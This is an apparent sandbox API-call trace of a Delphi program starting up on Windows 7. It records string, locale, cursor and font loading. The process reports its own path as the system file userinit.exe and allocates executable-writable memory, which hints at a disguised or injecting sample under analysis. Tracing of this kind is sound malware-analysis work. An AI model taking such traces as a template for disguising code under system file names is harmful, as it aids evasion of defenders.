[0137.877] LoadStringA (in: hInstance=0x400000, uID=0xfffc, lpBuffer=0xef554, cchBufferMax=1024 | out: lpBuffer="Integer overflow") returned 0x10
[0137.877] LoadStringA (in: hInstance=0x400000, uID=0xfffb, lpBuffer=0xef554, cchBufferMax=1024 | out: lpBuffer="Range check error") returned 0x11
[0137.877] LoadStringA (in: hInstance=0x400000, uID=0xfffa, lpBuffer=0xef554, cchBufferMax=1024 | out: lpBuffer="Division by zero") returned 0x10
[0137.877] LoadStringA (in: hInstance=0x400000, uID=0xfff9, lpBuffer=0xef554, cchBufferMax=1024 | out: lpBuffer="Invalid numeric input") returned 0x15
[0137.877] LoadStringA (in: hInstance=0x400000, uID=0xfff8, lpBuffer=0xef554, cchBufferMax=1024 | out: lpBuffer="Disk full") returned 0x9
[0137.877] LoadStringA (in: hInstance=0x400000, uID=0xfff7, lpBuffer=0xef554, cchBufferMax=1024 | out: lpBuffer="Read beyond end of file") returned 0x17
[0137.877] LoadStringA (in: hInstance=0x400000, uID=0xfff6, lpBuffer=0xef554, cchBufferMax=1024 | out: lpBuffer="File access denied") returned 0x12
[0137.877] LoadStringA (in: hInstance=0x400000, uID=0xfff5, lpBuffer=0xef554, cchBufferMax=1024 | out: lpBuffer="Too many open files") returned 0x13
[0137.877] LoadStringA (in: hInstance=0x400000, uID=0xfff4, lpBuffer=0xef554, cchBufferMax=1024 | out: lpBuffer="Invalid filename") returned 0x10
[0137.877] LoadStringA (in: hInstance=0x400000, uID=0xfff3, lpBuffer=0xef554, cchBufferMax=1024 | out: lpBuffer="File not found") returned 0xe
[0137.877] LoadStringA (in: hInstance=0x400000, uID=0xfff1, lpBuffer=0xef540, cchBufferMax=1024 | out: lpBuffer="Out of memory") returned 0xd
[0137.877] LoadStringA (in: hInstance=0x400000, uID=0xffe1, lpBuffer=0xef540, cchBufferMax=1024 | out: lpBuffer="Invalid pointer operation") returned 0x19
[0137.877] GetVersionExA (in: lpVersionInformation=0xef8d8*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0xef8d8*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0137.877] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75370000
[0137.877] GetProcAddress (hModule=0x75370000, lpProcName="GetDiskFreeSpaceExA") returned 0x753ff46f
[0137.877] GetThreadLocale () returned 0x409
[0137.877] GetThreadLocale () returned 0x409
[0137.877] GetLocaleInfoA (in: Locale=0x409, LCType=0x44, lpLCData=0xef7b0, cchData=256 | out: lpLCData="Jan") returned 4
[0137.877] GetLocaleInfoA (in: Locale=0x409, LCType=0x38, lpLCData=0xef7b0, cchData=256 | out: lpLCData="January") returned 8
[0137.877] GetLocaleInfoA (in: Locale=0x409, LCType=0x45, lpLCData=0xef7b0, cchData=256 | out: lpLCData="Feb") returned 4
[0137.877] GetLocaleInfoA (in: Locale=0x409, LCType=0x39, lpLCData=0xef7b0, cchData=256 | out: lpLCData="February") returned 9
[0137.877] GetLocaleInfoA (in: Locale=0x409, LCType=0x46, lpLCData=0xef7b0, cchData=256 | out: lpLCData="Mar") returned 4
[0137.877] GetLocaleInfoA (in: Locale=0x409, LCType=0x3a, lpLCData=0xef7b0, cchData=256 | out: lpLCData="March") returned 6
[0137.877] GetLocaleInfoA (in: Locale=0x409, LCType=0x47, lpLCData=0xef7b0, cchData=256 | out: lpLCData="Apr") returned 4
[0137.877] GetLocaleInfoA (in: Locale=0x409, LCType=0x3b, lpLCData=0xef7b0, cchData=256 | out: lpLCData="April") returned 6
[0137.877] GetLocaleInfoA (in: Locale=0x409, LCType=0x48, lpLCData=0xef7b0, cchData=256 | out: lpLCData="May") returned 4
[0137.877] GetLocaleInfoA (in: Locale=0x409, LCType=0x3c, lpLCData=0xef7b0, cchData=256 | out: lpLCData="May") returned 4
[0137.877] GetLocaleInfoA (in: Locale=0x409, LCType=0x49, lpLCData=0xef7b0, cchData=256 | out: lpLCData="Jun") returned 4
[0137.877] GetLocaleInfoA (in: Locale=0x409, LCType=0x3d, lpLCData=0xef7b0, cchData=256 | out: lpLCData="June") returned 5
[0137.877] GetLocaleInfoA (in: Locale=0x409, LCType=0x4a, lpLCData=0xef7b0, cchData=256 | out: lpLCData="Jul") returned 4
[0137.877] GetLocaleInfoA (in: Locale=0x409, LCType=0x3e, lpLCData=0xef7b0, cchData=256 | out: lpLCData="July") returned 5
[0137.877] GetLocaleInfoA (in: Locale=0x409, LCType=0x4b, lpLCData=0xef7b0, cchData=256 | out: lpLCData="Aug") returned 4
[0137.877] GetLocaleInfoA (in: Locale=0x409, LCType=0x3f, lpLCData=0xef7b0, cchData=256 | out: lpLCData="August") returned 7
[0137.877] GetLocaleInfoA (in: Locale=0x409, LCType=0x4c, lpLCData=0xef7b0, cchData=256 | out: lpLCData="Sep") returned 4
[0137.878] GetLocaleInfoA (in: Locale=0x409, LCType=0x40, lpLCData=0xef7b0, cchData=256 | out: lpLCData="September") returned 10
[0137.878] GetLocaleInfoA (in: Locale=0x409, LCType=0x4d, lpLCData=0xef7b0, cchData=256 | out: lpLCData="Oct") returned 4
[0137.878] GetLocaleInfoA (in: Locale=0x409, LCType=0x41, lpLCData=0xef7b0, cchData=256 | out: lpLCData="October") returned 8
[0137.878] GetLocaleInfoA (in: Locale=0x409, LCType=0x4e, lpLCData=0xef7b0, cchData=256 | out: lpLCData="Nov") returned 4
[0137.878] GetLocaleInfoA (in: Locale=0x409, LCType=0x42, lpLCData=0xef7b0, cchData=256 | out: lpLCData="November") returned 9
[0137.878] GetLocaleInfoA (in: Locale=0x409, LCType=0x4f, lpLCData=0xef7b0, cchData=256 | out: lpLCData="Dec") returned 4
[0137.878] GetLocaleInfoA (in: Locale=0x409, LCType=0x43, lpLCData=0xef7b0, cchData=256 | out: lpLCData="December") returned 9
[0137.878] GetLocaleInfoA (in: Locale=0x409, LCType=0x37, lpLCData=0xef7b0, cchData=256 | out: lpLCData="Sun") returned 4
[0137.878] GetLocaleInfoA (in: Locale=0x409, LCType=0x30, lpLCData=0xef7b0, cchData=256 | out: lpLCData="Sunday") returned 7
[0137.878] GetLocaleInfoA (in: Locale=0x409, LCType=0x31, lpLCData=0xef7b0, cchData=256 | out: lpLCData="Mon") returned 4
[0137.878] GetLocaleInfoA (in: Locale=0x409, LCType=0x2a, lpLCData=0xef7b0, cchData=256 | out: lpLCData="Monday") returned 7
[0137.878] GetLocaleInfoA (in: Locale=0x409, LCType=0x32, lpLCData=0xef7b0, cchData=256 | out: lpLCData="Tue") returned 4
[0137.878] GetLocaleInfoA (in: Locale=0x409, LCType=0x2b, lpLCData=0xef7b0, cchData=256 | out: lpLCData="Tuesday") returned 8
[0137.878] GetLocaleInfoA (in: Locale=0x409, LCType=0x33, lpLCData=0xef7b0, cchData=256 | out: lpLCData="Wed") returned 4
[0137.878] GetLocaleInfoA (in: Locale=0x409, LCType=0x2c, lpLCData=0xef7b0, cchData=256 | out: lpLCData="Wednesday") returned 10
[0137.878] GetLocaleInfoA (in: Locale=0x409, LCType=0x34, lpLCData=0xef7b0, cchData=256 | out: lpLCData="Thu") returned 4
[0137.878] GetLocaleInfoA (in: Locale=0x409, LCType=0x2d, lpLCData=0xef7b0, cchData=256 | out: lpLCData="Thursday") returned 9
[0137.878] GetLocaleInfoA (in: Locale=0x409, LCType=0x35, lpLCData=0xef7b0, cchData=256 | out: lpLCData="Fri") returned 4
[0137.878] GetLocaleInfoA (in: Locale=0x409, LCType=0x2e, lpLCData=0xef7b0, cchData=256 | out: lpLCData="Friday") returned 7
[0137.878] GetLocaleInfoA (in: Locale=0x409, LCType=0x36, lpLCData=0xef7b0, cchData=256 | out: lpLCData="Sat") returned 4
[0137.878] GetLocaleInfoA (in: Locale=0x409, LCType=0x2f, lpLCData=0xef7b0, cchData=256 | out: lpLCData="Saturday") returned 9
[0137.878] GetThreadLocale () returned 0x409
[0137.878] GetLocaleInfoA (in: Locale=0x409, LCType=0x14, lpLCData=0xef80c, cchData=256 | out: lpLCData="$") returned 2
[0137.878] GetLocaleInfoA (in: Locale=0x409, LCType=0x1b, lpLCData=0xef80c, cchData=256 | out: lpLCData="0") returned 2
[0137.878] GetLocaleInfoA (in: Locale=0x409, LCType=0x1c, lpLCData=0xef80c, cchData=256 | out: lpLCData="0") returned 2
[0137.878] GetLocaleInfoA (in: Locale=0x409, LCType=0xf, lpLCData=0xef904, cchData=2 | out: lpLCData=",") returned 2
[0137.878] GetLocaleInfoA (in: Locale=0x409, LCType=0xe, lpLCData=0xef904, cchData=2 | out: lpLCData=".") returned 2
[0137.878] GetLocaleInfoA (in: Locale=0x409, LCType=0x19, lpLCData=0xef80c, cchData=256 | out: lpLCData="2") returned 2
[0137.878] GetLocaleInfoA (in: Locale=0x409, LCType=0x1d, lpLCData=0xef904, cchData=2 | out: lpLCData="/") returned 2
[0137.878] GetLocaleInfoA (in: Locale=0x409, LCType=0x1f, lpLCData=0xef80c, cchData=256 | out: lpLCData="M/d/yyyy") returned 9
[0137.878] GetThreadLocale () returned 0x409
[0137.878] GetLocaleInfoA (in: Locale=0x409, LCType=0x1009, lpLCData=0xef7d8, cchData=256 | out: lpLCData="1") returned 2
[0137.878] GetLocaleInfoA (in: Locale=0x409, LCType=0x20, lpLCData=0xef80c, cchData=256 | out: lpLCData="dddd, MMMM dd, yyyy") returned 20
[0137.878] GetThreadLocale () returned 0x409
[0137.878] GetLocaleInfoA (in: Locale=0x409, LCType=0x1009, lpLCData=0xef7d8, cchData=256 | out: lpLCData="1") returned 2
[0137.878] GetLocaleInfoA (in: Locale=0x409, LCType=0x1e, lpLCData=0xef904, cchData=2 | out: lpLCData=":") returned 2
[0137.878] GetLocaleInfoA (in: Locale=0x409, LCType=0x28, lpLCData=0xef80c, cchData=256 | out: lpLCData="AM") returned 3
[0137.878] GetLocaleInfoA (in: Locale=0x409, LCType=0x29, lpLCData=0xef80c, cchData=256 | out: lpLCData="PM") returned 3
[0137.878] GetLocaleInfoA (in: Locale=0x409, LCType=0x25, lpLCData=0xef80c, cchData=256 | out: lpLCData="0") returned 2
[0137.878] GetLocaleInfoA (in: Locale=0x409, LCType=0x23, lpLCData=0xef80c, cchData=256 | out: lpLCData="0") returned 2
[0137.879] GetLocaleInfoA (in: Locale=0x409, LCType=0x1005, lpLCData=0xef80c, cchData=256 | out: lpLCData="0") returned 2
[0137.879] GetLocaleInfoA (in: Locale=0x409, LCType=0xc, lpLCData=0xef904, cchData=2 | out: lpLCData=",") returned 2
[0137.879] GetModuleHandleA (lpModuleName="oleaut32.dll") returned 0x758f0000
[0137.879] GetProcAddress (hModule=0x758f0000, lpProcName="VariantChangeTypeEx") returned 0x758f4c28
[0137.879] GetProcAddress (hModule=0x758f0000, lpProcName="VarNeg") returned 0x7596c802
[0137.879] GetProcAddress (hModule=0x758f0000, lpProcName="VarNot") returned 0x7596ec66
[0137.879] GetProcAddress (hModule=0x758f0000, lpProcName="VarAdd") returned 0x75915934
[0137.879] GetProcAddress (hModule=0x758f0000, lpProcName="VarSub") returned 0x7596d332
[0137.879] GetProcAddress (hModule=0x758f0000, lpProcName="VarMul") returned 0x7596dbd4
[0137.879] GetProcAddress (hModule=0x758f0000, lpProcName="VarDiv") returned 0x7596e405
[0137.879] GetProcAddress (hModule=0x758f0000, lpProcName="VarIdiv") returned 0x7596f00a
[0137.879] GetProcAddress (hModule=0x758f0000, lpProcName="VarMod") returned 0x7596f15e
[0137.879] GetProcAddress (hModule=0x758f0000, lpProcName="VarAnd") returned 0x75915a98
[0137.879] GetProcAddress (hModule=0x758f0000, lpProcName="VarOr") returned 0x7596ecfa
[0137.879] GetProcAddress (hModule=0x758f0000, lpProcName="VarXor") returned 0x7596ee2e
[0137.879] GetProcAddress (hModule=0x758f0000, lpProcName="VarCmp") returned 0x7590b0dc
[0137.879] GetProcAddress (hModule=0x758f0000, lpProcName="VarI4FromStr") returned 0x75906fab
[0137.879] GetProcAddress (hModule=0x758f0000, lpProcName="VarR4FromStr") returned 0x759101a0
[0137.880] GetProcAddress (hModule=0x758f0000, lpProcName="VarR8FromStr") returned 0x7590699e
[0137.880] GetProcAddress (hModule=0x758f0000, lpProcName="VarDateFromStr") returned 0x75916ba7
[0137.880] GetProcAddress (hModule=0x758f0000, lpProcName="VarCyFromStr") returned 0x75936c12
[0137.880] GetProcAddress (hModule=0x758f0000, lpProcName="VarBoolFromStr") returned 0x7590dbd1
[0137.880] GetProcAddress (hModule=0x758f0000, lpProcName="VarBstrFromCy") returned 0x75917fdc
[0137.880] GetProcAddress (hModule=0x758f0000, lpProcName="VarBstrFromDate") returned 0x75907a2a
[0137.880] GetProcAddress (hModule=0x758f0000, lpProcName="VarBstrFromBool") returned 0x75910355
[0137.880] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName="") returned 0x60
[0137.880] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=1, lpName=0x0) returned 0x64
[0137.880] CreateEventA (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x68
[0137.880] GetDC (hWnd=0x0) returned 0x4101082e
[0137.880] GetDeviceCaps (hdc=0x4101082e, index=90) returned 96
[0137.880] ReleaseDC (hWnd=0x0, hDC=0x4101082e) returned 1
[0137.880] GetDC (hWnd=0x0) returned 0x4101082e
[0137.881] GetDeviceCaps (hdc=0x4101082e, index=104) returned 0
[0137.881] ReleaseDC (hWnd=0x0, hDC=0x4101082e) returned 1
[0137.881] CreatePalette (plpal=0xef568) returned 0x1f08084b
[0137.881] GetStockObject (i=7) returned 0x1b00017
[0137.881] GetStockObject (i=5) returned 0x1900015
[0137.881] GetStockObject (i=13) returned 0x18a002e
[0137.881] LoadIconA (hInstance=0x0, lpIconName=0x7f00) returned 0x10027
[0137.881] MulDiv (nNumber=8, nNumerator=96, nDenominator=72) returned 11
[0137.881] GetModuleHandleA (lpModuleName="USER32.DLL") returned 0x757b0000
[0137.881] LoadStringA (in: hInstance=0x400000, uID=0xff4d, lpBuffer=0xef564, cchBufferMax=1024 | out: lpBuffer="Alt+") returned 0x4
[0137.881] LoadStringA (in: hInstance=0x400000, uID=0xff4c, lpBuffer=0xef564, cchBufferMax=1024 | out: lpBuffer="Ctrl+") returned 0x5
[0137.881] LoadStringA (in: hInstance=0x400000, uID=0xff4b, lpBuffer=0xef564, cchBufferMax=1024 | out: lpBuffer="Shift+") returned 0x6
[0137.881] LoadStringA (in: hInstance=0x400000, uID=0xff4a, lpBuffer=0xef564, cchBufferMax=1024 | out: lpBuffer="Del") returned 0x3
[0137.881] LoadStringA (in: hInstance=0x400000, uID=0xff49, lpBuffer=0xef564, cchBufferMax=1024 | out: lpBuffer="Ins") returned 0x3
[0137.881] LoadStringA (in: hInstance=0x400000, uID=0xff48, lpBuffer=0xef564, cchBufferMax=1024 | out: lpBuffer="Down") returned 0x4
[0137.881] LoadStringA (in: hInstance=0x400000, uID=0xff47, lpBuffer=0xef564, cchBufferMax=1024 | out: lpBuffer="Right") returned 0x5
[0137.881] LoadStringA (in: hInstance=0x400000, uID=0xff46, lpBuffer=0xef564, cchBufferMax=1024 | out: lpBuffer="Up") returned 0x2
[0137.881] LoadStringA (in: hInstance=0x400000, uID=0xff45, lpBuffer=0xef564, cchBufferMax=1024 | out: lpBuffer="Left") returned 0x4
[0137.881] LoadStringA (in: hInstance=0x400000, uID=0xff44, lpBuffer=0xef564, cchBufferMax=1024 | out: lpBuffer="Home") returned 0x4
[0137.881] LoadStringA (in: hInstance=0x400000, uID=0xff43, lpBuffer=0xef564, cchBufferMax=1024 | out: lpBuffer="End") returned 0x3
[0137.881] LoadStringA (in: hInstance=0x400000, uID=0xff42, lpBuffer=0xef564, cchBufferMax=1024 | out: lpBuffer="PgDn") returned 0x4
[0137.881] LoadStringA (in: hInstance=0x400000, uID=0xff41, lpBuffer=0xef564, cchBufferMax=1024 | out: lpBuffer="PgUp") returned 0x4
[0137.881] LoadStringA (in: hInstance=0x400000, uID=0xff40, lpBuffer=0xef564, cchBufferMax=1024 | out: lpBuffer="Space") returned 0x5
[0137.881] LoadStringA (in: hInstance=0x400000, uID=0xff5f, lpBuffer=0xef564, cchBufferMax=1024 | out: lpBuffer="Enter") returned 0x5
[0137.881] LoadStringA (in: hInstance=0x400000, uID=0xff5e, lpBuffer=0xef564, cchBufferMax=1024 | out: lpBuffer="Esc") returned 0x3
[0137.881] LoadStringA (in: hInstance=0x400000, uID=0xff5d, lpBuffer=0xef564, cchBufferMax=1024 | out: lpBuffer="Tab") returned 0x3
[0137.882] LoadStringA (in: hInstance=0x400000, uID=0xff5c, lpBuffer=0xef564, cchBufferMax=1024 | out: lpBuffer="BkSp") returned 0x4
[0137.882] LoadStringA (in: hInstance=0x400000, uID=0xff06, lpBuffer=0xef564, cchBufferMax=1024 | out: lpBuffer="Window Text") returned 0xb
[0137.882] LoadStringA (in: hInstance=0x400000, uID=0xff05, lpBuffer=0xef564, cchBufferMax=1024 | out: lpBuffer="Window Frame") returned 0xc
[0137.882] LoadStringA (in: hInstance=0x400000, uID=0xff04, lpBuffer=0xef564, cchBufferMax=1024 | out: lpBuffer="Window Background") returned 0x11
[0137.882] LoadStringA (in: hInstance=0x400000, uID=0xff03, lpBuffer=0xef564, cchBufferMax=1024 | out: lpBuffer="3D Light") returned 0x8
[0137.882] LoadStringA (in: hInstance=0x400000, uID=0xff02, lpBuffer=0xef564, cchBufferMax=1024 | out: lpBuffer="3D Dark Shadow") returned 0xe
[0137.882] LoadStringA (in: hInstance=0x400000, uID=0xff01, lpBuffer=0xef564, cchBufferMax=1024 | out: lpBuffer="Scroll Bar") returned 0xa
[0137.882] LoadStringA (in: hInstance=0x400000, uID=0xff00, lpBuffer=0xef564, cchBufferMax=1024 | out: lpBuffer="None") returned 0x4
[0137.882] LoadStringA (in: hInstance=0x400000, uID=0xff1f, lpBuffer=0xef564, cchBufferMax=1024 | out: lpBuffer="Menu Text") returned 0x9
[0137.882] LoadStringA (in: hInstance=0x400000, uID=0xff1e, lpBuffer=0xef564, cchBufferMax=1024 | out: lpBuffer="Menu Background") returned 0xf
[0137.882] LoadStringA (in: hInstance=0x400000, uID=0xff1d, lpBuffer=0xef564, cchBufferMax=1024 | out: lpBuffer="Info Text") returned 0x9
[0137.882] LoadStringA (in: hInstance=0x400000, uID=0xff1c, lpBuffer=0xef564, cchBufferMax=1024 | out: lpBuffer="Info Background") returned 0xf
[0137.882] LoadStringA (in: hInstance=0x400000, uID=0xff1b, lpBuffer=0xef564, cchBufferMax=1024 | out: lpBuffer="Inactive Caption Text") returned 0x15
[0137.882] LoadStringA (in: hInstance=0x400000, uID=0xff1a, lpBuffer=0xef564, cchBufferMax=1024 | out: lpBuffer="Inactive Caption") returned 0x10
[0137.882] LoadStringA (in: hInstance=0x400000, uID=0xff19, lpBuffer=0xef564, cchBufferMax=1024 | out: lpBuffer="Inactive Border") returned 0xf
[0137.882] LoadStringA (in: hInstance=0x400000, uID=0xff18, lpBuffer=0xef564, cchBufferMax=1024 | out: lpBuffer="Highlight Text") returned 0xe
[0137.882] LoadStringA (in: hInstance=0x400000, uID=0xff17, lpBuffer=0xef564, cchBufferMax=1024 | out: lpBuffer="Highlight Background") returned 0x14
[0137.882] LoadStringA (in: hInstance=0x400000, uID=0xff16, lpBuffer=0xef564, cchBufferMax=1024 | out: lpBuffer="Gray Text") returned 0x9
[0137.882] LoadStringA (in: hInstance=0x400000, uID=0xff15, lpBuffer=0xef564, cchBufferMax=1024 | out: lpBuffer="Default") returned 0x7
[0137.882] LoadStringA (in: hInstance=0x400000, uID=0xff14, lpBuffer=0xef564, cchBufferMax=1024 | out: lpBuffer="Caption Text") returned 0xc
[0137.882] LoadStringA (in: hInstance=0x400000, uID=0xff13, lpBuffer=0xef564, cchBufferMax=1024 | out: lpBuffer="Button Text") returned 0xb
[0137.882] LoadStringA (in: hInstance=0x400000, uID=0xff12, lpBuffer=0xef564, cchBufferMax=1024 | out: lpBuffer="Button Shadow") returned 0xd
[0137.882] LoadStringA (in: hInstance=0x400000, uID=0xff11, lpBuffer=0xef564, cchBufferMax=1024 | out: lpBuffer="Button Highlight") returned 0x10
[0137.882] LoadStringA (in: hInstance=0x400000, uID=0xff10, lpBuffer=0xef564, cchBufferMax=1024 | out: lpBuffer="Button Face") returned 0xb
[0137.882] LoadStringA (in: hInstance=0x400000, uID=0xff2f, lpBuffer=0xef564, cchBufferMax=1024 | out: lpBuffer="Background") returned 0xa
[0137.882] LoadStringA (in: hInstance=0x400000, uID=0xff2e, lpBuffer=0xef564, cchBufferMax=1024 | out: lpBuffer="Application Workspace") returned 0x15
[0137.882] LoadStringA (in: hInstance=0x400000, uID=0xff2d, lpBuffer=0xef564, cchBufferMax=1024 | out: lpBuffer="Active Caption") returned 0xe
[0137.883] LoadStringA (in: hInstance=0x400000, uID=0xff2c, lpBuffer=0xef564, cchBufferMax=1024 | out: lpBuffer="Active Border") returned 0xd
[0137.883] LoadStringA (in: hInstance=0x400000, uID=0xff2b, lpBuffer=0xef564, cchBufferMax=1024 | out: lpBuffer="Medium Gray") returned 0xb
[0137.883] LoadStringA (in: hInstance=0x400000, uID=0xff2a, lpBuffer=0xef564, cchBufferMax=1024 | out: lpBuffer="Cream") returned 0x5
[0137.883] LoadStringA (in: hInstance=0x400000, uID=0xff29, lpBuffer=0xef564, cchBufferMax=1024 | out: lpBuffer="Sky Blue") returned 0x8
[0137.883] LoadStringA (in: hInstance=0x400000, uID=0xff28, lpBuffer=0xef564, cchBufferMax=1024 | out: lpBuffer="Money Green") returned 0xb
[0137.883] LoadStringA (in: hInstance=0x400000, uID=0xff27, lpBuffer=0xef564, cchBufferMax=1024 | out: lpBuffer="White") returned 0x5
[0137.883] LoadStringA (in: hInstance=0x400000, uID=0xff26, lpBuffer=0xef564, cchBufferMax=1024 | out: lpBuffer="Aqua") returned 0x4
[0137.883] LoadStringA (in: hInstance=0x400000, uID=0xff25, lpBuffer=0xef564, cchBufferMax=1024 | out: lpBuffer="Fuchsia") returned 0x7
[0137.883] LoadStringA (in: hInstance=0x400000, uID=0xff24, lpBuffer=0xef564, cchBufferMax=1024 | out: lpBuffer="Blue") returned 0x4
[0137.883] LoadStringA (in: hInstance=0x400000, uID=0xff23, lpBuffer=0xef564, cchBufferMax=1024 | out: lpBuffer="Yellow") returned 0x6
[0137.883] LoadStringA (in: hInstance=0x400000, uID=0xff22, lpBuffer=0xef564, cchBufferMax=1024 | out: lpBuffer="Lime") returned 0x4
[0137.883] LoadStringA (in: hInstance=0x400000, uID=0xff21, lpBuffer=0xef564, cchBufferMax=1024 | out: lpBuffer="Red") returned 0x3
[0137.883] LoadStringA (in: hInstance=0x400000, uID=0xff20, lpBuffer=0xef564, cchBufferMax=1024 | out: lpBuffer="Silver") returned 0x6
[0137.883] LoadStringA (in: hInstance=0x400000, uID=0xff3f, lpBuffer=0xef564, cchBufferMax=1024 | out: lpBuffer="Gray") returned 0x4
[0137.883] LoadStringA (in: hInstance=0x400000, uID=0xff3e, lpBuffer=0xef564, cchBufferMax=1024 | out: lpBuffer="Teal") returned 0x4
[0137.883] LoadStringA (in: hInstance=0x400000, uID=0xff3d, lpBuffer=0xef564, cchBufferMax=1024 | out: lpBuffer="Purple") returned 0x6
[0137.883] LoadStringA (in: hInstance=0x400000, uID=0xff3c, lpBuffer=0xef564, cchBufferMax=1024 | out: lpBuffer="Navy") returned 0x4
[0137.883] LoadStringA (in: hInstance=0x400000, uID=0xff3b, lpBuffer=0xef564, cchBufferMax=1024 | out: lpBuffer="Olive") returned 0x5
[0137.883] LoadStringA (in: hInstance=0x400000, uID=0xff3a, lpBuffer=0xef564, cchBufferMax=1024 | out: lpBuffer="Green") returned 0x5
[0137.883] LoadStringA (in: hInstance=0x400000, uID=0xff39, lpBuffer=0xef564, cchBufferMax=1024 | out: lpBuffer="Maroon") returned 0x6
[0137.883] LoadStringA (in: hInstance=0x400000, uID=0xff38, lpBuffer=0xef564, cchBufferMax=1024 | out: lpBuffer="Black") returned 0x5
[0137.883] RegisterClipboardFormatA (lpszFormat="Delphi Picture") returned 0xc157
[0137.883] RegisterClipboardFormatA (lpszFormat="Delphi Component") returned 0xc158
[0137.883] GetVersion () returned 0x1db10106
[0137.883] GetCurrentProcessId () returned 0x888
[0137.883] GlobalAddAtomA (lpString="Delphi00000888") returned 0xc125
[0137.883] GetCurrentThreadId () returned 0x8a0
[0137.883] GlobalAddAtomA (lpString="ControlOfs00400000000008A0") returned 0xc124
[0137.883] RegisterClipboardFormatA (lpszFormat="ControlOfs00400000000008A0") returned 0xc174
[0137.884] GetProcAddress (hModule=0x757b0000, lpProcName="GetMonitorInfoA") returned 0x757bc34e
[0137.884] GetProcAddress (hModule=0x757b0000, lpProcName="GetSystemMetrics") returned 0x757c67cf
[0137.884] GetSystemMetrics (nIndex=19) returned 1
[0137.932] GetSystemMetrics (nIndex=75) returned 1
[0137.932] SystemParametersInfoA (in: uiAction=0x68, uiParam=0x0, pvParam=0x12d1310, fWinIni=0x0 | out: pvParam=0x12d1310) returned 1
[0137.932] LoadCursorA (hInstance=0x0, lpCursorName=0x7f00) returned 0x10003
[0137.932] LoadCursorA (hInstance=0x0, lpCursorName=0x7f86) returned 0x10015
[0137.932] LoadCursorA (hInstance=0x400000, lpCursorName=0x7ff9) returned 0x601af
[0137.933] LoadCursorA (hInstance=0x0, lpCursorName=0x7f8b) returned 0x1001b
[0137.933] LoadCursorA (hInstance=0x0, lpCursorName=0x7f8a) returned 0x10019
[0137.933] LoadCursorA (hInstance=0x0, lpCursorName=0x7f88) returned 0x10017
[0137.933] LoadCursorA (hInstance=0x400000, lpCursorName=0x7ffa) returned 0x140067
[0137.933] LoadCursorA (hInstance=0x400000, lpCursorName=0x7ffb) returned 0x701a9
[0137.933] LoadCursorA (hInstance=0x400000, lpCursorName=0x7ffc) returned 0x801c7
[0137.933] LoadCursorA (hInstance=0x400000, lpCursorName=0x7ffd) returned 0x80201
[0137.933] LoadCursorA (hInstance=0x400000, lpCursorName=0x7fff) returned 0x801c5
[0137.934] LoadCursorA (hInstance=0x400000, lpCursorName=0x7ffe) returned 0x801c1
[0137.934] LoadCursorA (hInstance=0x0, lpCursorName=0x7f02) returned 0x10007
[0137.934] LoadCursorA (hInstance=0x0, lpCursorName=0x7f04) returned 0x1000b
[0137.934] LoadCursorA (hInstance=0x0, lpCursorName=0x7f84) returned 0x10011
[0137.934] LoadCursorA (hInstance=0x0, lpCursorName=0x7f82) returned 0x1000d
[0137.934] LoadCursorA (hInstance=0x0, lpCursorName=0x7f85) returned 0x10013
[0137.934] LoadCursorA (hInstance=0x0, lpCursorName=0x7f83) returned 0x1000f
[0137.934] LoadCursorA (hInstance=0x0, lpCursorName=0x7f86) returned 0x10015
[0137.934] LoadCursorA (hInstance=0x0, lpCursorName=0x7f01) returned 0x10005
[0137.934] LoadCursorA (hInstance=0x0, lpCursorName=0x7f03) returned 0x10009
[0137.934] LoadCursorA (hInstance=0x0, lpCursorName=0x7f00) returned 0x10003
[0137.934] GetKeyboardLayout (idThread=0x0) returned 0x4090409
[0137.934] GetDC (hWnd=0x0) returned 0x4101082e
[0137.934] GetDeviceCaps (hdc=0x4101082e, index=90) returned 96
[0137.934] ReleaseDC (hWnd=0x0, hDC=0x4101082e) returned 1
[0137.934] GetProcAddress (hModule=0x757b0000, lpProcName="EnumDisplayMonitors") returned 0x757c34a3
[0137.934] EnumDisplayMonitors (hdc=0x0, lprcClip=0x0, lpfnEnum=0x444d6c, dwData=0x12d155c) returned 1
[0137.935] SystemParametersInfoA (in: uiAction=0x1f, uiParam=0x3c, pvParam=0xef8cf, fWinIni=0x0 | out: pvParam=0xef8cf) returned 1
[0137.935] CreateFontIndirectA (lplf=0xef8cf) returned 0x280a084f
[0137.935] GetObjectA (in: h=0x280a084f, c=60, pv=0xef6c0 | out: pv=0xef6c0) returned 60
[0137.935] SystemParametersInfoA (in: uiAction=0x29, uiParam=0x0, pvParam=0xef77b, fWinIni=0x0 | out: pvParam=0xef77b) returned 1
[0137.935] CreateFontIndirectA (lplf=0xef857) returned 0x1f0a0831
[0137.935] GetObjectA (in: h=0x1f0a0831, c=60, pv=0xef6c0 | out: pv=0xef6c0) returned 60
[0137.935] CreateFontIndirectA (lplf=0xef81b) returned 0x470a0863
[0137.935] GetObjectA (in: h=0x470a0863, c=60, pv=0xef6c0 | out: pv=0xef6c0) returned 60
[0137.935] LoadIconA (hInstance=0x400000, lpIconName="MAINICON") returned 0x0
[0137.935] GetModuleFileNameA (in: hModule=0x400000, lpFilename=0xef82f, nSize=0x100 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0137.935] OemToCharA (in: pSrc="C:\\Windows\\System32\\userinit.exe", pDst=0xef82f | out: pDst="C:\\Windows\\System32\\userinit.exe") returned 1
[0137.935] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x1000, flProtect=0x40) returned 0x60000
[0137.936] GetClassInfoA (in: hInstance=0x400000, lpClassName="TApplication", lpWndClass=0xef7e4 | out: lpWndClass=0xef7e4) returned 0
[0137.936] RegisterClassA (lpWndClass=0x451c88) returned 0x20c167
[0137.936] GetSystemMetrics (nIndex=0) returned 1440
[0137.936] GetSystemMetrics (nIndex=1) returned 900
